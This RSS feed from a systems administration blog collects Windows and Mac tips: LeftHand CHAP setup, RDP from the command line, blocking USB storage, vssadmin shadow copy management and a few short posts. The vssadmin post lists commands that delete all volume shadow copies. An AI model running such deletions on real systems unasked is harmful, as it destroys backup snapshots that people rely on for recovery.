<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Krypted &#187; Windows Server</title>
	<atom:link href="http://krypted.com/category/windows-server/feed/" rel="self" type="application/rss+xml" />
	<link>http://krypted.com</link>
	<description>Notes from the field</description>
	<lastBuildDate>Wed, 28 Jul 2010 03:19:43 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Setting up CHAP on LeftHand w/ CLI</title>
		<link>http://krypted.com/unix/setting-up-chap-on-lefthand-w-cli/</link>
		<comments>http://krypted.com/unix/setting-up-chap-on-lefthand-w-cli/#comments</comments>
		<pubDate>Wed, 05 May 2010 15:00:01 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Unix]]></category>
		<category><![CDATA[Windows Server]]></category>
		<category><![CDATA[Xsan]]></category>
		<category><![CDATA[admin]]></category>
		<category><![CDATA[assignvolumechap]]></category>
		<category><![CDATA[chap]]></category>
		<category><![CDATA[CLI]]></category>
		<category><![CDATA[cliq]]></category>
		<category><![CDATA[Command line]]></category>
		<category><![CDATA[deletevolume]]></category>
		<category><![CDATA[getLocalVolumes]]></category>
		<category><![CDATA[lefthand]]></category>
		<category><![CDATA[modifyraid]]></category>
		<category><![CDATA[modifyvolume]]></category>
		<category><![CDATA[Password]]></category>
		<category><![CDATA[username]]></category>
		<category><![CDATA[volume]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=5984</guid>
		<description><![CDATA[LeftHand Storage uses the cliq command line for configuring their devices. cliq isn&#8217;t necessarily interactive and so we end up needing to specify the username, password and IP of the device with each command (although you can setup a key as well if you&#8217;re going to be doing automated tasks). One task that I&#8217;ve found [...]]]></description>
			<content:encoded><![CDATA[<p>LeftHand Storage uses the cliq command line for configuring their devices. cliq isn&#8217;t necessarily interactive and so we end up needing to specify the username, password and IP of the device with each command (although you can setup a key as well if you&#8217;re going to be doing automated tasks). One task that I&#8217;ve found to be pretty common is to use cliq to enable Chap authentication for volumes. To do so you&#8217;ll use the assignVolumeChap verb. Along with the assignVolumeChap verb you will need a number of options, each with an = for the payload of the option and delimited with a space between them.</p>
<p>When using the assignVolumeChap verb you will need to supply a volume that you will be enabling authentication on, which is done using the volumeName option. You will also need to assign a password that will be entered on devices in order to connect to the target/volume, done using the targetSecret option. With most commands you will also need to specify the address of the storage node, the administrative user for that storage node and the password for it as well, these done using login, userName and passWord options respectively. You can obtain information about volumes using the getLocalVolumes verb:</p>
<blockquote><p>cliq getLocalVolumes</p></blockquote>
<p>To put all of these together, let&#8217;s look at an example where the storage node has an IP address of 192.168.100.100, an administrative user name of admin and an administrative password of ADMINPASSWORD. For this storage node we have a volume that we have created called MYSHAREDVOLUME and want to use a password of PASSWORDFORLUN to access it.</p>
<blockquote><p>cliq assignVolumeChap volumeName=MYSHAREDVOLUME targetSecret=PASSWORDFORLUN login=192.168.100.100 userName=admin passWord=ADMINPASSWORD</p></blockquote>
<p>Some other important verbs we&#8217;ve had to use are createCluster, connectVolume, configureRaid, createRemoteSnapshot (which is good to do before making any changes btw) and of course, createVolume (which you would need to do before assigning authentication to the volume). Each item that has a create typically has an associated delete (eg &#8211; deleteVolume, deleteRaid, etc) and an associated modify (eg &#8211; modifyVolume, modifyRaid, etc), which can be used to remove the added item and edit it (respectively). Overall, there are a lot of verbs that can be used with cliq, making it a somewhat robust scripting interface if you need to automate events.</p>
<p>Another verb I find that I use a lot when I&#8217;m first setting up a device is the getPerformanceStats verb, which has a single option in interval, the number of milliseconds between sampling the performance statistics.<strong>Similar Articles:</strong>
<ul class="similar-posts">
<li><a href="http://krypted.com/unix/clariionnavisphere-cli/" rel="bookmark" title="October 22, 2009">Clariion/Navisphere CLI</a></li>
<li><a href="http://krypted.com/mac-os-x/more-group-management-with-dseditgroup/" rel="bookmark" title="September 8, 2009">More Group Management with dseditgroup</a></li>
<li><a href="http://krypted.com/mac-os-x/accessing-mobileme-public-folders/" rel="bookmark" title="May 18, 2009">Accessing MobileMe Public Folders</a></li>
<li><a href="http://krypted.com/mac-os-x/scripting-compellent/" rel="bookmark" title="November 4, 2009">Scripting Compellent</a></li>
<li><a href="http://krypted.com/mac-os-x/programatically-setting-password-policies/" rel="bookmark" title="August 14, 2009">Programatically Setting Password Policies</a></li>
</ul>
<p><!-- Similar Posts took 5.598 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/unix/setting-up-chap-on-lefthand-w-cli/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>RDP from the Command Line</title>
		<link>http://krypted.com/mac-os-x/rdp-from-the-command-line/</link>
		<comments>http://krypted.com/mac-os-x/rdp-from-the-command-line/#comments</comments>
		<pubDate>Mon, 01 Feb 2010 16:00:15 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Mac OS X]]></category>
		<category><![CDATA[Windows Server]]></category>
		<category><![CDATA[Command line]]></category>
		<category><![CDATA[cord]]></category>
		<category><![CDATA[programatically]]></category>
		<category><![CDATA[RDP]]></category>
		<category><![CDATA[Remote Desktop]]></category>
		<category><![CDATA[script]]></category>
		<category><![CDATA[scripting]]></category>
		<category><![CDATA[Shell]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=5769</guid>
		<description><![CDATA[Let&#8217;s face it, connecting to Windows Servers is a must for many of us. And some of us want to do so programatically. I did look at populating the CoRD database in a previous article. But now, luckily CoRD has recently introduced a command line interface for managing just these types of connections on the [...]]]></description>
			<content:encoded><![CDATA[<p>Let&#8217;s face it, connecting to Windows Servers is a must for many of us. And some of us want to do so programatically. I did look at populating the CoRD database <a href="http://krypted.com/mac-os-x/pushing-additions-to-cord-from-shell/">in a previous article</a>. But now, luckily CoRD has recently introduced a command line interface for managing just these types of connections on the fly as well. And, it is very straight forward.</p>
<p>There are two ways to call CoRD from the command line. The first is similar to <a href="http://krypted.com/mac-os-x/programatic-screen-sharing/">how we handled VNC in an earlier article</a>. Simply leverage the open command and call the URL with a rdp in the beginning. For example, if you want to open a connection to a server called windows.krypted.com you would use the following command:</p>
<p>open rdp://windows.krypted.com</p>
<p>As with VNC you can also inject he user name and the password as well. To do so insert the username after the rdp:// and with an @ before the domain or IP. And to inject the password follow the username with a : and then the password followed by the @. For example, if our username were daneel and our password were seldon then the command would be:</p>
<p>open rdp://daneel:seldon@windows.krypted.com</p>
<p>There are other options as well, which you can find at <a href="http://sourceforge.net/apps/trac/cord/wiki/CommandLineUse">the CoRD Wiki</a>. You can also connect by calling the CoRD command, which is located in the /Applications/CoRD.app/Contents/MacOS directory. The CoRD command then has the following options:<br />
host &#8211; define the IP address or host name of the computer you are connecting to<br />
port &#8211; if a custom port (not 3389) is used then use that to connect to the computer<br />
u &#8211; define a username<br />
p &#8211; define a password<br />
d &#8211; Windows domain name<br />
a &#8211; set screen depth to 8, 16, 24 or 32<br />
width &#8211; set the width of the resultant window<br />
height &#8211; set the height of the resultant window</p>
<p>So if you would like to connect to windows.krypted.com with the same user and password as before, but now with a custom port of 3390 you would use the following command:<br />
/Applications/CoRD.app/Contents/MacOS/CoRD -host windows.krypted.com -port 3390 -u daneel -p seldon</p>
<p>I guess next I&#8217;m going to have to build a Dashboard widget to fire up a connection on the fly&#8230; <img src='http://krypted.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> <strong>Similar Articles:</strong>
<ul class="similar-posts">
<li><a href="http://krypted.com/mac-os-x/pushing-additions-to-cord-from-shell/" rel="bookmark" title="May 14, 2009">Pushing Additions to CoRD from Shell</a></li>
<li><a href="http://krypted.com/mac-os-x/programatic-screen-sharing/" rel="bookmark" title="January 26, 2010">Programatic Screen Sharing</a></li>
<li><a href="http://krypted.com/mac-os-x/automating-ftp/" rel="bookmark" title="March 3, 2005">FTP Command Line and Automation</a></li>
<li><a href="http://krypted.com/mac-os-x/mail-attachments-from-the-command-line/" rel="bookmark" title="June 18, 2009">Mail Attachments from the Command Line</a></li>
<li><a href="http://krypted.com/mac-os-x/keyboard-shortcuts-windows/" rel="bookmark" title="August 9, 2006">Keyboard Shortcuts: Windows</a></li>
</ul>
<p><!-- Similar Posts took 9.830 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/mac-os-x/rdp-from-the-command-line/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Windows 7: Disable USB Storage</title>
		<link>http://krypted.com/windows-server/windows-7-disable-usb-storage/</link>
		<comments>http://krypted.com/windows-server/windows-7-disable-usb-storage/#comments</comments>
		<pubDate>Mon, 01 Feb 2010 15:00:53 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Windows Server]]></category>
		<category><![CDATA[Windows XP]]></category>
		<category><![CDATA[disable USB]]></category>
		<category><![CDATA[Windows 7]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=5764</guid>
		<description><![CDATA[In a number of environments, especially MPAA or DoD environments (in the US we rank nuclear bombs right up there with pilfered copies of unreleased movies, especially ones that cost a lot of $ to make), users should not be able to mount any local removable storage. While Group Policy is typically the best way [...]]]></description>
			<content:encoded><![CDATA[<p>In a number of environments, especially MPAA or DoD environments (in the US we rank nuclear bombs right up there with pilfered copies of unreleased movies, especially ones that cost a lot of $ to make), users should not be able to mount any local removable storage. While Group Policy is typically the best way to keep users from mounting said storage, you can also do so without assigning GPOs. Simply make the permissions on the following files set to Deny (assuming your c:\Windows directory = %SystemRoot%):</p>
<p>C:\Windows\Inf\Usbstor.pnf<br />
C:\Windows\Inf\Usbstor.inf</p>
<p>You may also need to add the System account to the Deny list for those files, but in my experience you don&#8217;t always need to do so.<strong>Similar Articles:</strong>
<ul class="similar-posts">
<li><a href="http://krypted.com/mac-os-x/making-windows-7-look-like-mac-os-x/" rel="bookmark" title="July 1, 2009">Making Windows 7 Look Like Mac OS X</a></li>
<li><a href="http://krypted.com/vmware/windows-server-2008-r2/" rel="bookmark" title="September 17, 2009">Windows Server 2008 R2</a></li>
<li><a href="http://krypted.com/windows-xp/windows-7-themed-xp/" rel="bookmark" title="April 5, 2009">Windows 7 Themed XP</a></li>
<li><a href="http://krypted.com/windows-server/windows-7/" rel="bookmark" title="November 9, 2008">Windows 7 Alpha</a></li>
<li><a href="http://krypted.com/windows-xp/making-windows-7-icons-transparent/" rel="bookmark" title="January 30, 2010">Making Windows 7 Icons Transparent</a></li>
</ul>
<p><!-- Similar Posts took 7.739 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/windows-server/windows-7-disable-usb-storage/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Show Desktop Icon for Windows &amp; Windows 7</title>
		<link>http://krypted.com/windows-server/5647/</link>
		<comments>http://krypted.com/windows-server/5647/#comments</comments>
		<pubDate>Wed, 20 Jan 2010 14:00:33 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Windows Server]]></category>
		<category><![CDATA[Windows XP]]></category>
		<category><![CDATA[recreate]]></category>
		<category><![CDATA[scf]]></category>
		<category><![CDATA[script]]></category>
		<category><![CDATA[Show Desktop]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=5647</guid>
		<description><![CDATA[Ever delete the Show Desktop icon from Quick Launch? One of my favorite features of Windows, it is a big part of my everyday use of the OS. So when I accidentally deleted it I had to figure out how to get it back. And it wasn&#8217;t nearly as easy as I would have thought [...]]]></description>
			<content:encoded><![CDATA[<p>Ever delete the Show Desktop icon from Quick Launch? One of my favorite features of Windows, it is a big part of my everyday use of the OS. So when I accidentally deleted it I had to figure out how to get it back. And it wasn&#8217;t nearly as easy as I would have thought (in my case) as I had deleted the actual scf file. To recreate that file was a bit complicated. So I wanted to document my steps. First, create a new file called Show Desktop.scf. Then open the file in your favorite text editor and paste in these contents:</p>
<blockquote><p>[Shell]<br />
Command=2<br />
IconFile=explorer.exe,3<br />
[Taskbar]<br />
Command=ToggleDesktop</p></blockquote>
<p>Save the Show Desktop.scf and then drag it to the Quick Launch bar. You are now off to the races. You can also use this script to create an icon and pin it somewhere in Windows 7; pretty useful if you miss Show Desktop&#8230; Now that I&#8217;ve gotten to this point, why stop?How might we do the same thing in Mac OS X? Stay tuned&#8230;<strong>Similar Articles:</strong>
<ul class="similar-posts">
<li><a href="http://krypted.com/windows-server/keystrokes-for-windowswindows-server-explorer/" rel="bookmark" title="April 15, 2009">Keystrokes For Windows/Windows Server Explorer</a></li>
<li><a href="http://krypted.com/active-directory/getting-started-with-amazons-ec2-cloud/" rel="bookmark" title="May 1, 2009">Getting Started with Amazon&#039;s EC2 Cloud</a></li>
<li><a href="http://krypted.com/windows-server/keystrokes-for-windows-7/" rel="bookmark" title="July 12, 2009">Keystrokes for Windows 7</a></li>
<li><a href="http://krypted.com/mac-os-x/my-top-10-list-of-firefox-add-ons/" rel="bookmark" title="January 1, 2010">My Top 10 List of Firefox Add-ons</a></li>
<li><a href="http://krypted.com/windows-xp/windows-local-policies/" rel="bookmark" title="April 20, 2007">Windows: Local Policies</a></li>
</ul>
<p><!-- Similar Posts took 5.101 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/windows-server/5647/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>AFP548 Article on CommVault/GroupLogic</title>
		<link>http://krypted.com/mac-os-x-server/afp548-article-on-commvaultgrouplogic/</link>
		<comments>http://krypted.com/mac-os-x-server/afp548-article-on-commvaultgrouplogic/#comments</comments>
		<pubDate>Thu, 14 Jan 2010 03:10:49 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Mac OS X Server]]></category>
		<category><![CDATA[Windows Server]]></category>
		<category><![CDATA[afp548.com]]></category>
		<category><![CDATA[commvault]]></category>
		<category><![CDATA[GroupLogic]]></category>
		<category><![CDATA[Mac OS X]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=5616</guid>
		<description><![CDATA[I did a quick little article on the GroupLogic offering for Mac OS X and CommVault. Find it here: http://www.afp548.com/article.php?story=20100112101925439Similar Articles:

High Availability in Mac OS X
Extreme Z-IP &#38; DFS
IDG Article on Macs in the Enterprise
DNS Caching and Apple
iWork or Trojan


Copyright &#169; 2008 This feed is for personal, non-commercial use only.  The use of this [...]]]></description>
			<content:encoded><![CDATA[<p>I did a quick little article on the GroupLogic offering for Mac OS X and CommVault. Find it here: <a href="http://www.afp548.com/article.php?story=20100112101925439">http://www.afp548.com/article.php?story=20100112101925439</a><strong>Similar Articles:</strong>
<ul class="similar-posts">
<li><a href="http://krypted.com/mac-os-x-server/high-availability-in-mac-os-x/" rel="bookmark" title="February 18, 2005">High Availability in Mac OS X</a></li>
<li><a href="http://krypted.com/mac-os-x/extreme-z-ip-dfs/" rel="bookmark" title="April 4, 2009">Extreme Z-IP &amp; DFS</a></li>
<li><a href="http://krypted.com/articles-and-books/idg-article-on-macs-in-the-enterprise/" rel="bookmark" title="February 5, 2008">IDG Article on Macs in the Enterprise</a></li>
<li><a href="http://krypted.com/articles-and-books/dns-caching-and-apple/" rel="bookmark" title="July 31, 2008">DNS Caching and Apple</a></li>
<li><a href="http://krypted.com/mac-security/iwork-or-trojan/" rel="bookmark" title="January 22, 2009">iWork or Trojan</a></li>
</ul>
<p><!-- Similar Posts took 9.372 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/mac-os-x-server/afp548-article-on-commvaultgrouplogic/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Lots of new stuff: Command Line Wiki Integration</title>
		<link>http://krypted.com/mac-os-x/command-line-wiki-integration/</link>
		<comments>http://krypted.com/mac-os-x/command-line-wiki-integration/#comments</comments>
		<pubDate>Thu, 17 Dec 2009 13:00:20 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Mac OS X]]></category>
		<category><![CDATA[Mac OS X Server]]></category>
		<category><![CDATA[Mac Security]]></category>
		<category><![CDATA[Mass Deployment]]></category>
		<category><![CDATA[Unix]]></category>
		<category><![CDATA[Windows Server]]></category>
		<category><![CDATA[Windows XP]]></category>
		<category><![CDATA[Xsan]]></category>
		<category><![CDATA[Command line]]></category>
		<category><![CDATA[powershell]]></category>
		<category><![CDATA[scripting]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[xsan commands]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=5338</guid>
		<description><![CDATA[The Mac Commands page and the PowerShell Commands page are both now wikis and users with accounts on this site can edit them.
Additionally I added a number of new pages worth of commands, FTP Commands, Windows Commands, Final Cut Server Commands, Amazon S3 Commands, Podcast Producer Commands and Xsan Commands; both of which are wikis as [...]]]></description>
			<content:encoded><![CDATA[<p>The <a href="http://krypted.com/commands/mac-commands/">Mac Commands</a> page and the <a href="http://krypted.com/commands/powershell-commands/">PowerShell Commands</a> page are both now wikis and users with accounts on this site can edit them.</p>
<p>Additionally I added a number of new pages worth of commands, <a href="http://krypted.com/commands/ftp-commands/">FTP Commands</a>, <a href="http://krypted.com/commands/windows-commands/">Windows Commands</a>, <a href="http://krypted.com/commands/final-cut-server-commands/">Final Cut Server Commands</a>, <a href="http://krypted.com/commands/amazon-s3cmd-commands/">Amazon S3 Commands</a>, <a href="http://krypted.com/commands/podcast-producer-commands/">Podcast Producer Commands</a> and <a href="http://krypted.com/commands/xsan-commands/">Xsan Commands</a>; both of which are wikis as well.<strong>Similar Articles:</strong>
<ul class="similar-posts">
<li><a href="http://krypted.com/mac-os-x-server/podcast-producer-web-controller/" rel="bookmark" title="August 8, 2009">Podcast Producer Web Controller</a></li>
<li><a href="http://krypted.com/windows-server/stornext-command-line-for-windows/" rel="bookmark" title="May 27, 2009">StorNext Command Line for Windows</a></li>
<li><a href="http://krypted.com/mac-os-x/my-top-10-list-of-firefox-add-ons/" rel="bookmark" title="January 1, 2010">My Top 10 List of Firefox Add-ons</a></li>
<li><a href="http://krypted.com/mac-os-x/adding-man-pages/" rel="bookmark" title="May 13, 2009">Adding Man Pages</a></li>
<li><a href="http://krypted.com/active-directory/getting-started-with-amazons-ec2-cloud/" rel="bookmark" title="May 1, 2009">Getting Started with Amazon&#039;s EC2 Cloud</a></li>
</ul>
<p><!-- Similar Posts took 9.188 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/mac-os-x/command-line-wiki-integration/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Shadow Copy from the Command Line</title>
		<link>http://krypted.com/windows-server/shadow-copy-from-the-command-line/</link>
		<comments>http://krypted.com/windows-server/shadow-copy-from-the-command-line/#comments</comments>
		<pubDate>Tue, 20 Oct 2009 15:00:54 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Windows Server]]></category>
		<category><![CDATA[create]]></category>
		<category><![CDATA[list]]></category>
		<category><![CDATA[shadow copy]]></category>
		<category><![CDATA[shadows]]></category>
		<category><![CDATA[shadowstorage]]></category>
		<category><![CDATA[vssadmin]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=4868</guid>
		<description><![CDATA[I was recently building some scripts to alternate shadow copy storage locations (long story). In so doing, I found that pretty much anything I would normally do in the GUI is exposed at the command prompt using the vssadmin command. The first and one of the most important things that you can do is list [...]]]></description>
			<content:encoded><![CDATA[<p>I was recently building some scripts to alternate shadow copy storage locations (long story). In so doing, I found that pretty much anything I would normally do in the GUI is exposed at the command prompt using the vssadmin command. The first and one of the most important things that you can do is list settings. This includes the following:</p>
<ul>
<li>providers &#8211; lists components that can create and maintain shadow copies</li>
<li>shadows &#8211; lists shadow copies</li>
<li>shadowstorage &#8211; lists storage that can be used for shadow copies</li>
<li>volumes &#8211; lists volumes that have shadow copy enabled</li>
<li>writers &#8211; lists registered components of applications that store persistent information on a volume with shadow copy enabled</li>
</ul>
<p>You can create a shadow copy of a volume using the vssadmin command along with the create shadow verb. You would also need to specify which drive you will be creating a shadow copy of using the /for option. For example:<br />
<code>vssadmin create shadow /for=C:</code></p>
<p>Once you have created a shadow copy you can then add more storage to it using the vssadmin add shadowstorage command. Here, you&#8217;d indicate the volume to enable shadow copy /for and then the volume to put the shadow copy storage /on and finally the maximum size with /maxsize, as follows:<br />
<code>vssadmin add shadowstorage /for=c: /on=d: /maxsize=1tb</code></p>
<p>Once you have storage, you can also resize it. To do so use the resize verb and then mimic what you did previously, when adding shadowstorage but replacing the maxsize variable with a new number. For example:<br />
<code>vssadmin resize shadowstorage /for=c: /on=d: /maxsize=100gb<br />
</code></p>
<p>In addition to being able to resize the storage you can also delete it using the delete verb along with shadowstorage. For example:<br />
<code>vssadmin delete shadowstorage /for=c: /on=d:<br />
</code></p>
<p>And finally you can also delete shadows themselves<br />
<code>vssadmin delete shadows /for=c: /all<br />
</code><br />
Or to just delete the oldest:<br />
<code>vssadmin delete shadows /for=c: /oldest</code></p>
<p>Or finally, to just delete one from the list of shadows (where the X&#8217;s are replaced with your shadow id obtained using the list shadows):<br />
<code>vssadmin delete shadows /for=c: /shadow=XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX<br />
</code></p>
<p>Still can&#8217;t seem to make it work with Samba on Mac OS X, but that&#8217;s another story for another day&#8230;  :)<strong>Similar Articles:</strong>
<ul class="similar-posts">
<li><a href="http://krypted.com/active-directory/managing-the-keytab-with-ktutil/" rel="bookmark" title="December 12, 2007">Managing the Keytab with ktutil</a></li>
<li><a href="http://krypted.com/xsan/isolating-inodes-in-xsan-cvfsck-output/" rel="bookmark" title="February 12, 2010">Isolating iNodes in Xsan cvfsck Output</a></li>
</ul>
<p><!-- Similar Posts took 3.497 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/windows-server/shadow-copy-from-the-command-line/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>That Wacky Adobe Security Flaw</title>
		<link>http://krypted.com/mac-os-x/that-wacky-adobe-security-flaw/</link>
		<comments>http://krypted.com/mac-os-x/that-wacky-adobe-security-flaw/#comments</comments>
		<pubDate>Sun, 18 Oct 2009 13:00:55 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Mac OS X]]></category>
		<category><![CDATA[Mac Security]]></category>
		<category><![CDATA[Windows Server]]></category>
		<category><![CDATA[Windows XP]]></category>
		<category><![CDATA[adobe]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[flaw]]></category>
		<category><![CDATA[threat]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=4862</guid>
		<description><![CDATA[Information about the exploit: Wacky Security Flaw
Patch thyself: Adobe&#8217;s Mac patch site
Adobe&#8217;s Windows patch site
That is all I have to say about that.Similar Articles:

Bubble Alerts w/ Silent Installs
SANS Course on Mac OS X Security
securemac.com
Windows memory dump files.
More on OS X Memory/Security


Copyright &#169; 2008 This feed is for personal, non-commercial use only.  The use of [...]]]></description>
			<content:encoded><![CDATA[<p>Information about the exploit: <a href="http://www.adobe.com/support/security/bulletins/apsb09-15.html">Wacky Security Flaw</a><br />
Patch thyself: <a href="http://www.adobe.com/support/downloads/product.jsp?product=10&#038;platform=Macintosh">Adobe&#8217;s Mac patch site</a><br />
<a href="http://www.adobe.com/support/downloads/product.jsp?product=10&#038;platform=Windows">Adobe&#8217;s Windows patch site</a></p>
<p>That is all I have to say about that.<strong>Similar Articles:</strong>
<ul class="similar-posts">
<li><a href="http://krypted.com/windows-server/bubble-alerts-w-silent-installs/" rel="bookmark" title="September 5, 2009">Bubble Alerts w/ Silent Installs</a></li>
<li><a href="http://krypted.com/mac-os-x/sans-course-on-mac-os-x-security/" rel="bookmark" title="August 27, 2007">SANS Course on Mac OS X Security</a></li>
<li><a href="http://krypted.com/mac-os-x/securemaccom/" rel="bookmark" title="February 4, 2008">securemac.com</a></li>
<li><a href="http://krypted.com/windows-xp/windows-memory-dump-files/" rel="bookmark" title="April 10, 2009">Windows memory dump files.</a></li>
<li><a href="http://krypted.com/mac-os-x/more-on-os-x-memorysecurity/" rel="bookmark" title="June 23, 2009">More on OS X Memory/Security</a></li>
</ul>
<p><!-- Similar Posts took 7.768 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/mac-os-x/that-wacky-adobe-security-flaw/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Home Robotics</title>
		<link>http://krypted.com/business/home-robotics/</link>
		<comments>http://krypted.com/business/home-robotics/#comments</comments>
		<pubDate>Sat, 03 Oct 2009 13:00:55 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Business]]></category>
		<category><![CDATA[Windows Server]]></category>
		<category><![CDATA[personal]]></category>
		<category><![CDATA[irobot]]></category>
		<category><![CDATA[iscooba]]></category>
		<category><![CDATA[positronic brain]]></category>
		<category><![CDATA[robotics]]></category>
		<category><![CDATA[roomba]]></category>
		<category><![CDATA[z-wave]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=4753</guid>
		<description><![CDATA[Technology is a beautiful thing. Especially for those of us that hate to do the dishes, get up to change the channel or even walk over to grandma&#8217;s house to say hi. For those things we have (respectively) dishwashers, remote controls and of course the telephone. I&#8217;ve talked about Z-Wave for awhile now and automating [...]]]></description>
			<content:encoded><![CDATA[<p>Technology is a beautiful thing. Especially for those of us that hate to do the dishes, get up to change the channel or even walk over to grandma&#8217;s house to say hi. For those things we have (respectively) dishwashers, remote controls and of course the telephone. I&#8217;ve talked about Z-Wave for awhile now and automating the home &#8211; but that&#8217;s automating electrical currents. But what I haven&#8217;t talked about is automating the cleaning that goes on in the home. And I&#8217;m not referencing putting a cleaning service on automated bill pay; I&#8217;m talking about robotics.</p>
<p>To sweep, mop and do tasks beyond those that have been automated for 30 or more years we&#8217;re going to need to employ the help of robotics. To most, robotics just seem really expensive. But if you&#8217;ve seen Robot Wars you should know by now that not all people who build robots are actually made of money. And if there is to be large scale introduction of robotics in the home, again beyond the automations that we have used for decades, integration needs to be cost effective. iRobot has been a company that has been getting simple, robotic devices at a price point that makes its products accessible in the home.</p>
<p>For starters, there&#8217;s the Roomba. The <a href="http://www.amazon.com/gp/product/B000UUBCNO?ie=UTF8&amp;tag=charlesedge-20&amp;linkCode=as2&amp;camp=1789&amp;creative=390957&amp;creativeASIN=B000UUBCNO">Roomba</a><img style="border:none !important; margin:0px !important;" src="http://www.assoc-amazon.com/e/ir?t=charlesedge-20&amp;l=as2&amp;o=1&amp;a=B000UUBCNO" border="0" alt="" width="1" height="1" /> is a vacuum cleaner that, well, runs itself. There&#8217;s also a cousin to the Roomba, the <a href="http://www.amazon.com/gp/product/B000OQAMOO?ie=UTF8&amp;tag=charlesedge-20&amp;linkCode=as2&amp;camp=1789&amp;creative=390957&amp;creativeASIN=B000OQAMOO">Dirt Dog Workshop Robot</a><img style="border:none !important; margin:0px !important;" src="http://www.assoc-amazon.com/e/ir?t=charlesedge-20&amp;l=as2&amp;o=1&amp;a=B000OQAMOO" border="0" alt="" width="1" height="1" />, which will do pretty much the same stuff as the Roomba but is designed for messy workshop areas with more dirt and less carpet&#8230; Most have already heard of the Roomba though and in addition, there&#8217;s newer products from iRobot that can clean gutters, mop and even clean pools. The gutter cleaner is the <a href="http://www.amazon.com/gp/product/B001R4CPME?ie=UTF8&amp;tag=charlesedge-20&amp;linkCode=as2&amp;camp=1789&amp;creative=390957&amp;creativeASIN=B001R4CPME">Looj Gutter Cleaning Robot</a><img style="border:none 